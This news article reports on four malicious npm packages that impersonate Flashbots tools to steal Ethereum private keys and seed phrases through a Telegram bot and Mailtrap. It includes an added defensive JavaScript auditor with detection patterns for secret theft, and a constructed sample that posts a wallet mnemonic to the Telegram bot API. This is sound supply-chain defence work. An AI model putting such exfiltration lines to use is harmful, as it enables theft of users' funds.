Malicious npm Packages Steal Ethereum Wallets by Impersonating Flashbots

Malicious npm Packages Disguised as Flashbots Tools Target Ethereum Wallets and Developers

  • Researchers have found four harmful npm packages targeting Ethereum wallet credentials.
  • The packages pretend to be official Flashbots tools but steal private keys and mnemonic phrases.
  • The attackers use Telegram bots and Mailtrap for sending stolen data.
  • Some of the packages redirect transactions to attacker-controlled wallets.
  • Vietnamese language comments suggest a Vietnamese-speaking attacker.

Security researchers discovered four malicious software packages on the npm registry that target cryptocurrency developers by stealing sensitive wallet information. The packages, uploaded by a user called flashbotts, were posted between September 2023 and August 19, 2025, and are still available for download.


According to Socket researcher Kush Pandya, the harmful packages pretend to be legitimate cryptographic utilities and claim to offer compatibility with Flashbots MEV infrastructure. In reality, these packages extract private keys and mnemonic seed phrases—critical information for accessing cryptocurrency wallets—and send them to an attacker-controlled Telegram bot. One of the packages, @flashbotts/ethers-provider-bundle, also transmits environment variables over SMTP through the Mailtrap email service.

The most dangerous package, @flashbotts/ethers-provider-bundle, hides its harmful actions under the appearance of offering full API support for Flashbots. It includes a function that forwards all unsigned Ethereum transactions to the attacker’s address and logs information from already signed transactions. Another package, sdk-ethers, can send wallet seed phrases to the Telegram bot, though these functions only activate when called by developers in their code. The package flashbot-sdk-eth also tries to steal private keys, and gram-utilz provides a way to send any data to the attacker’s Telegram chat.
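As an added defender-side example (not Socket's tooling or code from the article), the script below flags the four package names named in the report in a package-lock.json and scans package source for the exfiltration traits the report describes; the regexes are assumed heuristics and the inputs are constructed.

```javascript
// Added example, not Socket's tooling or code from the article: flag the four
// package names the report lists in a package-lock.json, and scan package
// source for the exfiltration traits it describes. Regexes are assumed heuristics.
const KNOWN_BAD = new Set([
  '@flashbotts/ethers-provider-bundle', 'sdk-ethers', 'flashbot-sdk-eth', 'gram-utilz',
]);

// Traits from the report: Telegram bot API as a drop, SMTP via Mailtrap,
// reads of mnemonic/private-key material, dumping process.env.
const HEURISTICS = [
  { name: 'telegram-bot-api', re: /api\.telegram\.org\/bot/i },
  { name: 'mailtrap-smtp', re: /mailtrap/i },
  { name: 'secret-access', re: /\b(mnemonic|seed ?phrase|privateKey)\b/i },
  { name: 'env-dump', re: /JSON\.stringify\(\s*process\.env\s*\)/ },
];

// Walk a lockfileVersion 2/3 "packages" map; keys are paths under node_modules.
function auditLockfile(lock) {
  const flagged = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const name = entry.name || path.replace(/^.*node_modules\//, '');
    if (KNOWN_BAD.has(name)) flagged.push({ name, version: entry.version });
  }
  return flagged;
}

// A package is only "suspicious" when it both touches secrets and has an
// outbound channel; either alone is common in legitimate wallet code.
function scanSource(name, source) {
  const hits = HEURISTICS.filter((h) => h.re.test(source)).map((h) => h.name);
  const touchesSecrets = hits.includes('secret-access') || hits.includes('env-dump');
  const hasChannel = hits.includes('telegram-bot-api') || hits.includes('mailtrap-smtp');
  return { name, hits, suspicious: touchesSecrets && hasChannel };
}

// Constructed inputs for a stand-alone run (not real package contents).
const SAMPLE_LOCK = {
  packages: {
    'node_modules/ethers': { version: '6.13.0' },
    'node_modules/@flashbotts/ethers-provider-bundle': { version: '1.0.0' },
  },
};
const SAMPLE_SOURCE = [
  "const url = 'https://api.telegram.org/bot' + token + '/sendMessage';",
  'post(url, { text: wallet.mnemonic.phrase });',
].join('\n');

console.log(auditLockfile(SAMPLE_LOCK));
console.log(scanSource('@flashbotts/ethers-provider-bundle', SAMPLE_SOURCE));
```

In a real audit, point auditLockfile at the parsed lockfile and scanSource at each installed package's JavaScript files; a flagged name is a definite hit, while a "suspicious" source scan is a prompt for manual review.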

Mnemonic phrases serve as the master password to restore and access cryptocurrency wallets. If attackers steal these phrases, they can take full control of victims’ funds. Socket’s analysis found comments in Vietnamese throughout the code, suggesting the attacker may be Vietnamese-speaking.

Socket stated, “Because Flashbots is widely trusted by validators, searchers, and DeFi developers, any package that appears to be an official SDK has a high chance of being adopted by operators running trading bots or managing hot wallets. A compromised private key in this environment can lead to immediate, irreversible theft of funds.”


Researchers say these attacks take advantage of trust in familiar package names and legitimate-looking utilities to slip harmful code past users. The findings highlight a growing threat of software supply chain attacks that exploit trust within the cryptocurrency development community.
